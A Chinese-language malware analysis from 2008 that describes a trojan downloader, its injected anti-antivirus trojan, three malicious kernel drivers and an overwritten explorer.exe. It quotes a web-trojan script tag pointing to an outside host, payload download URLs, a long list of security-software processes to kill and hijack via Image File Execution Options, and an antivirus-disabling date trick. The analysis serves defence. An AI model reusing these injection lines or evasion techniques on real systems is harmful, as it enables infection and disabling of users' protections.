/////////////////////////////////////////////////////////////////////////////////
文章名称：逆向分析一种带有3个恶意驱动的木马下载器病毒
文章类型：病毒原理逆向反汇编分析播报
编写作者：Coderui
编写日期：2008年04月29日
作者博客：http://hi.baidu.com/coderui
/////////////////////////////////////////////////////////////////////////////////
--------------------------------------------------------------------------------
总体概述：

　　木马下载器安装程序运行后，会将恶意可执行代码注入到系统“svchost.exe”进程中，然后调用执行。被注入的恶意代码所执行的功能是反安全软件，会在用户系统中安装3个恶意驱动程序去破坏用户计算机的安全防护机制。最后利用恶意磁盘过滤驱动程序去覆盖“explorer.exe”系统桌面程序，借助该程序去实现开机自启动，下载大量木马到用户计算机中安装运行。这样会给被感染计算机系统的用户带去不同程度的损失。
--------------------------------------------------------------------------------
详细分析：

------------------------------------------------------------------
对病毒主程序“x.exe”的分析：

病毒名称：Worm/Downloader.eg
中 文 名：“桌面幽灵”变种eg
病毒长度：26868字节
病毒类型：蠕虫
危险级别：★★
影响平台：Win 9X/ME/NT/2000/XP/2003
病毒描述：
    Worm/Downloader.eg“桌面幽灵”变种eg是蠕虫病毒家族的最新成员之一，采用Visual C++ 6.0编写，并经过添加“Upack V0.37”压缩壳处理，脱壳后的程序入口点为：00401B90。“桌面幽灵”变种eg运行后会执行如下操作：
    01、首先检测自身进程是否被其它调试软件所调试分析，如果发现自身正在被调试分析则自动关闭退出，防止病毒研究人员分析该病毒。
    02、遍历当前计算机系统中的进程列表，如发现有“AVP.EXE”进程存在，则设置系统年份为2001年，使卡巴斯基杀毒软件由于时间处理错误的BUG，导致其杀毒和保护功能失效。
    03、“桌面幽灵”变种eg在被感染计算机的后台以挂起的方式调用系统“svchost.exe”进程，并将恶意可执行代码注入到已挂起的系统“svchost.exe”进程的内存空间中，然后恢复挂起，使其系统“svchost.exe”进程开始执行恶意操作（其中，被注入恶意代码的系统“svchost.exe”进程为“Trojan/AntiAV.a“系统杀手”变种a”木马病毒，所执行的功能在下文）。
    04、“桌面幽灵”变种eg的任务执行完毕后，会马上关闭退出。在退出时，被注入恶意代码的系统“svchost.exe”进程会删除掉“桌面幽灵”变种eg蠕虫病毒所在磁盘中的文件，使用户无法寻找到该病毒样本。
------------------------------------------------------------------
------------------------------------------------------------------
对被注入恶意可执行代码的“svchost.exe”系统进程进行分析：

病毒名称：Trojan/AntiAV.a
中 文 名：“系统杀手”变种a
病毒长度：94208字节
病毒类型：木马
危险级别：★★
影响平台：Win 9X/ME/NT/2000/XP/2003
病毒描述：
    Trojan/AntiAV.a“系统杀手”变种a是木马家族的最新成员之一，采用VC++ 6.0编写，并经过加壳处理。“系统杀手”变种a是被其它恶意程序注入到系统“svchost.exe”进程内存空间中的可执行程序。运行后会执行如下操作：
    01、首先检测自身进程是否被其它调试软件所调试分析，如果发现自身正在被调试分析则自动关闭退出，防止病毒研究人员分析该病毒。
    02、创建“tls”事件，创建“\\.\AttObject1”设备。
    03、遍历当前计算机系统中的进程列表，如发现有“AVP.EXE”进程存在，则设置系统年份为2001年，使卡巴斯基正版杀毒软件由于时间处理的设计缺陷，导致其杀毒和保护功能失效。
    04、在被感染计算机系统的“%SystemRoot%\system32\”目录下创建病毒配置文件“atielf.dat”。
    05、在被感染计算机系统的临时文件夹下释放恶意驱动文件“~wxp2ins.*.tmp”（其中，“*”号表示为：随机3位数字，文件大小为：6,144 字节，文件属性为：隐藏。），“系统杀手”变种a把该恶意驱动文件安装启动后，会利用该恶意驱动程序去还原系统“SSDT HOOK”，使部分安全软件的防御系统和监控系统失效，从而达到木马免杀和躲避监控的目的。该恶意驱动程序任务执行完毕后，会被“系统杀手”变种a卸载删除掉。
    06、遍历当前计算机系统中的进程列表，如发现有如下（regtool.exe、KPPMain.exe、egui.exe、kpfw32.exe、kwatch.exe、kpfwsvc.exe、kavstart.exe、kaccore.exe、kissvc.exe、kmailmon.exe、esafe.exe、ravtool.exe、ravtask.exe、ravstub.exe、UpLive.exe、UmxPol.exe、UmxFwHlp.exe、UmxCfg.exe、UmxAttachment.exe、UmxAgent.exe、UIHost.exe、TrojDie.kxp、Trojanwall.exe、TrojanDetector.exe、SysSafe.exe、symlcsvc.exe、SREng.EXE、SmartUp.exe、shcfg32.exe、scan32.exe、safelive.exe、Rsaupd.exe、RegClean.exe、QHSET.exe、PFWLiveUpdate.exe、KAV32.exe、mmqczj.exe、mcconsol.exe、MagicSet.exe、KWatchX.exe、KWatch9x.exe、kvupload.exe、KVStub.kxp、KVSrvXP.exe、KVScan.kxp、KvReport.kxp、kvolself.exe、kvol.exe、KVMonXP_1.kxp、KvfwMcl.exe、KvDetect.exe、KVCenter.kxp、KsLoader.exe、KRepair.com.KRegEx.exe..KMFilter.exe、KMailMon.exe、KISLnchr.exe、KAVStart.exe、KAVSetup.exe、KAVPFW.exe、KAVDX.exe、KASTask.exe、KASMain.exe、KaScrScn.SCR、kabaload.exe、isPwdSvc.exe、HijackThis.exe、FTCleanerShell.exe、FileDsty.exe、ccSvcHst.exe、CCenter.exe、AvMonitor.exe、avgrssvc.exe、autoruns.exe、AppSvc32.exe、AgentSvr.exe、IceSword.exe、adam.exe、WoptiClean.exe、nod32krn.exe、mmsk.exe、Ras.exe、vsstat.exe、NPFMntor.exe、webscanx.exe、avconsol.exe、Navapsvc.exe、KPFW32.exe、KAVPF.exe、procexp.exe、safebank.exe、rfwproxy.exe、FYFireWall.exe、avp.com、rfwsrv.exe、rfwmain.exe、rfwstub、exe、idag.exe、WinDbg.exe、OllyICE.EXE、OllyDBG.EXE、360safe.exe、qqkav.exe、qqdoctor.exe、safeboxtray.exe、360rpt.exe、360safebox.exe、360tray.exe、qqsc.exe、ati2evxx.exe、Iparmor.exe、PFW.exe、navapsvc.exe、Navapw32.exe、KVwsc.exe、KVsrvXP.exe、KVFW.EXE、rav.exe、ravtimer.exe、RAVmon.exe、RAVmonD.exe、rising.exe、KAVsvcUI.exe、kavsvc.exe、avp.exe、runiep.exe）进程名存在，则会试图去关闭它们，从而达到自我保护的目的。
    07、在被感染计算机系统的后台监视当前运行着的程序窗口，如发现有“瑞星提示”窗口名存在，则会向其窗口发送关闭消息，从而保护自己不被查杀。
    08、在被感染计算机系统的“%SystemRoot%\system32\”目录下创建批处理文件“atielf.dat”，在系统后台调用运行后，利用该批处理程序去关闭“系统防火墙”。
    09、在被感染计算机系统注册表“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\”项下添加如下（regtool.exe、KPPMain.exe、egui.exe、kpfw32.exe、kwatch.exe、kpfwsvc.exe、kavstart.exe、kaccore.exe、kissvc.exe、kmailmon.exe、esafe.exe、ravtool.exe、ravtask.exe、ravstub.exe、UpLive.exe、UmxPol.exe、UmxFwHlp.exe、UmxCfg.exe、UmxAttachment.exe、UmxAgent.exe、UIHost.exe、TrojDie.kxp、Trojanwall.exe、TrojanDetector.exe、SysSafe.exe、symlcsvc.exe、SREng.EXE、SmartUp.exe、shcfg32.exe、scan32.exe、safelive.exe、Rsaupd.exe、RegClean.exe、QHSET.exe、PFWLiveUpdate.exe、KAV32.exe、mmqczj.exe、mcconsol.exe、MagicSet.exe、KWatchX.exe、KWatch9x.exe、kvupload.exe、KVStub.kxp、KVSrvXP.exe、KVScan.kxp、KvReport.kxp、kvolself.exe、kvol.exe、KVMonXP_1.kxp、KvfwMcl.exe、KvDetect.exe、KVCenter.kxp、KsLoader.exe、KRepair.com.KRegEx.exe..KMFilter.exe、KMailMon.exe、KISLnchr.exe、KAVStart.exe、KAVSetup.exe、KAVPFW.exe、KAVDX.exe、KASTask.exe、KASMain.exe、KaScrScn.SCR、kabaload.exe、isPwdSvc.exe、HijackThis.exe、FTCleanerShell.exe、FileDsty.exe、ccSvcHst.exe、CCenter.exe、AvMonitor.exe、avgrssvc.exe、autoruns.exe、AppSvc32.exe、AgentSvr.exe、IceSword.exe、adam.exe、WoptiClean.exe、nod32krn.exe、mmsk.exe、Ras.exe、vsstat.exe、NPFMntor.exe、webscanx.exe、avconsol.exe、Navapsvc.exe、KPFW32.exe、KAVPF.exe、procexp.exe、safebank.exe、rfwproxy.exe、FYFireWall.exe、avp.com、rfwsrv.exe、rfwmain.exe、rfwstub、exe、idag.exe、WinDbg.exe、OllyICE.EXE、OllyDBG.EXE、360safe.exe、qqkav.exe、qqdoctor.exe、safeboxtray.exe、360rpt.exe、360safebox.exe、360tray.exe、qqsc.exe、ati2evxx.exe、Iparmor.exe、PFW.exe、navapsvc.exe、Navapw32.exe、KVwsc.exe、KVsrvXP.exe、KVFW.EXE、rav.exe、ravtimer.exe、RAVmon.exe、RAVmonD.exe、rising.exe、KAVsvcUI.exe、kavsvc.exe、avp.exe、runiep.exe）键。利用进程映像劫持功能，禁止这些安全软件启动运行。
    10、在被感染计算机系统的后台，连接骇客指定远程服务器站点“http://9797aini.com/x.txt”，获取其它恶意程序的下载地址列表（里边存放着10个以上的恶意程序下载地址）。然后下载列表中的所有恶意程序，并自动调用安装运行它们。其中，所下载的恶意程序可能包含网游木马、恶意广告程序、后门等，给用户带来不同程度的损失。
    11、“系统杀手”变种a具有自动升级的功能，木马下载地址为“http://9797aini.com/x.exe”。
    12、“系统杀手”变种a可能具有自动网页挂马的功能，挂马语句为“<script language=javascript src="http://www.nb586.com/ts.js"></script>”。
    13、在被感染计算机系统的临时文件夹下释放恶意磁盘过滤驱动程序文件“~wxp2ins.*.tmp”（其中，“*”号表示为：随机3位数字，文件大小为：3,328 字节，文件属性为：隐藏。），“系统杀手”变种a把该恶意驱动文件安装启动后，利用该恶意磁盘过滤驱动程序去覆盖破坏被感染计算机磁盘中的系统桌面程序“explorer.exe”，把恶意可执行代码写入到系统桌面程序中。该恶意驱动程序具有绕过“还原保护系统”，去覆盖破坏被感染计算机真实磁盘中系统文件的功能，使用户防不胜防。该恶意驱动程序任务执行完毕后，会被“系统杀手”变种a卸载删除掉。这里使用的是简单方法的磁盘过滤驱动程序。
    14、在被感染计算机系统的临时文件夹下释放恶意磁盘过滤驱动程序文件“~wxp2ins.*.tmp”（其中，“*”号表示为：随机3位数字，文件大小为：11,008 字节，文件属性为：隐藏。），“系统杀手”变种a把该恶意驱动文件安装启动后，利用该恶意磁盘过滤驱动程序去覆盖破坏被感染计算机磁盘中的系统桌面程序“explorer.exe”，把恶意可执行代码写入到系统桌面程序中。该恶意驱动程序具有绕过“还原保护系统”，去覆盖破坏被感染计算机真实磁盘中系统文件的功能，使用户防不胜防。该恶意驱动程序任务执行完毕后，会被“系统杀手”变种a卸载删除掉。这里使用的是复杂方法的磁盘过滤驱动程序，病毒对系统桌面程序“explorer.exe”连续进行了两次不同方法的覆盖破坏操作，只是想把成功的几率提升的更高些。
------------------------------------------------------------------
------------------------------------------------------------------
对释放出来的第一个恶意驱动程序“~wxp2ins.*.tmp”进行分析：

病毒名称：Rootkit.ArpDriver.b
中 文 名：“ARP杀手”变种b
病毒长度：6144字节
病毒类型：木马
危险级别：★★
影响平台：Win 9X/ME/NT/2000/XP/2003
病毒描述：
    Rootkit.ArpDriver.b“ARP杀手”变种b是木马家族的最新成员之一，该木马是一个恶意驱动程序，采用C语言编写，未经过加密处理。“ARP杀手”变种b一般以系统服务的方式来运行，当“ARP杀手”变种b被安装启动后，它会去执行还原系统“SSDT HOOK”的操作，使部分安全软件的防御系统和监控系统失效，从而达到木马免杀和躲避监控的目的。“ARP杀手”变种b木马属于恶意程序集合中的一个功能模块，伴随着该木马程序模块还会有很多其它恶意程序模块一起安装到了被感染计算机用户的系统中。如果用户计算机感染了该类病毒，那么很难彻底清除干净，会给被感染计算机系统的用户带去不同程度的损失。
------------------------------------------------------------------
------------------------------------------------------------------
对释放出来的第二个恶意驱动程序“~wxp2ins.*.tmp”进行分析：

病毒名称：Rootkit.ArpDriver.a
中 文 名：“ARP杀手”变种a
病毒长度：11008字节
病毒类型：木马
危险级别：★★
影响平台：Win 9X/ME/NT/2000/XP/2003
病毒描述：
    Rootkit.ArpDriver.a“ARP杀手”变种a是木马家族的最新成员之一，该木马是一个恶意的磁盘过滤驱动程序，采用C语言编写，未经过加密处理。“ARP杀手”变种a一般以系统服务的方式来运行，当“ARP杀手”变种a被安装启动后，病毒主程序会利用“ARP杀手”变种a恶意磁盘过滤驱动程序去破坏被感染计算机磁盘中的系统文件。“ARP杀手”变种a具有绕过“还原保护系统”，去破坏被感染计算机真实磁盘中系统文件的功能，使用户防不胜防。“ARP杀手”变种a木马属于恶意程序集合中的一个功能模块，伴随着该木马程序模块还会有很多其它恶意程序模块一起安装到了被感染计算机用户的系统中。如果用户计算机感染了该类病毒，那么很难彻底清除干净，会给被感染计算机系统的用户带去不同程度的损失。

------------------------------------------------------------------
------------------------------------------------------------------
对释放出来的第三个恶意驱动程序“~wxp2ins.*.tmp”进行分析：

病毒名称：TrojanDownloader.Agent.aeit
中 文 名：“代理木马”变种aeit
病毒长度：3328字节
病毒类型：木马
危险级别：★★
影响平台：Win 9X/ME/NT/2000/XP/2003
病毒描述：
    TrojanDownloader.Agent.aeit“代理木马”变种aeit是木马家族的最新成员之一，该木马是一个恶意的磁盘过滤驱动程序，采用C语言编写，未经过加密处理。“代理木马”变种aeit一般以系统服务的方式来运行，当“代理木马”变种aeit被安装启动后，病毒主程序会利用“代理木马”变种aeit恶意磁盘过滤驱动程序去破坏被感染计算机磁盘中的系统文件。“代理木马”变种aeit具有绕过“还原保护系统”，去破坏被感染计算机真实磁盘中系统文件的功能，使用户防不胜防。“代理木马”变种aeit木马属于恶意程序集合中的一个功能模块，伴随着该木马程序模块还会有很多其它恶意程序模块一起安装到了被感染计算机用户的系统中。如果用户计算机感染了该类病毒，那么很难彻底清除干净，会给被感染计算机系统的用户带去不同程度的损失。
------------------------------------------------------------------
------------------------------------------------------------------
对被病毒覆盖的“explorer.exe”系统桌面程序进行分析：

病毒名称：Win32/DogArp.Gen
中 文 名：“机器狗”变种
病毒长度：977920字节
病毒类型：蠕虫
危险级别：★★
影响平台：Win 9X/ME/NT/2000/XP/2003
病毒描述：
    Win32/DogArp.Gen“机器狗”变种是蠕虫家族的最新成员之一，采用VC++ 6.0编写，并经过加壳保护处理。“机器狗”变种是被其它病毒程序感染的“explorer.exe”系统桌面程序，开机后随系统的启动而加载运行。“机器狗”变种运行后，会判断被感染计算机“%SystemRoot%\system32\dllcache\”目录下是否有“explorer.exe”系统桌面备份程序文件存在（如果不存在，则会在被感染计算机系统的后去连接骇客指定远程服务器站点“http://122.224.5.16/”，下载压缩后的系统桌面程序“e.jpg”，并将其保存为“%SystemRoot%\system32\dllcache\explorer.exe”后，再调用运行。如果存在，则直接调用运行）。然后，“机器狗”变种会再次在被感染计算机系统的后台去连接骇客指定远程服务器站点“http://122.224.5.16/”，下载其它恶意程序“x.exe”并自动调用安装运行。其中，所下载的恶意程序“x.exe”可能为网络游戏盗号木马、木马下载器、蠕虫病毒等，会给被感染计算机系统的用户带去不同程度的损失。
------------------------------------------------------------------
--------------------------------------------------------------------------------
/////////////////////////////////////////////////////////////////////////////////

[招生]科锐逆向工程师培训(2024年11月15日实地，远程教学同时开班, 第51期)